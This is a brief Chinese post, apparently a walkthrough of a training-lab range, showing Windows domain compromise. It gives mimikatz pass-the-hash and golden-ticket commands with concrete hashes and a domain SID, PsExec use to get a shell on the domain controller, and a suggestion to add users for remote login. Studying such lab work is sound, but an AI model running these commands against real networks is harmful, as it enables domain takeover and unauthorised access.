c78exn-5qmtbw.aqlab.cn:12781
进入主机10.0.1.4zkaq.cn
的域内zkaq.cn
,而加密的密文NTLM为:61465a991b168727b65b3644aab823cd
sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:61465a991b168727b65b3644aab823cd
dir \\dc.zkaq.cn\c$
来查看域内名为dc的主机的c盘文件,证明已经获取和dc域控主机通信的权限.(绝对路径)PsExec.exe \\dc.zkaq.cn cmd
kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:567.kiribi
(注意,空格不能少) PsExec.exe \\dc.zkaq.cn cmd
获取目标主机cmd,然后就又可以增加用户来远程登录域控主机了打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
adminyg
发表于 2023-1-14
这是学院靶场吗
评论列表
加载数据中...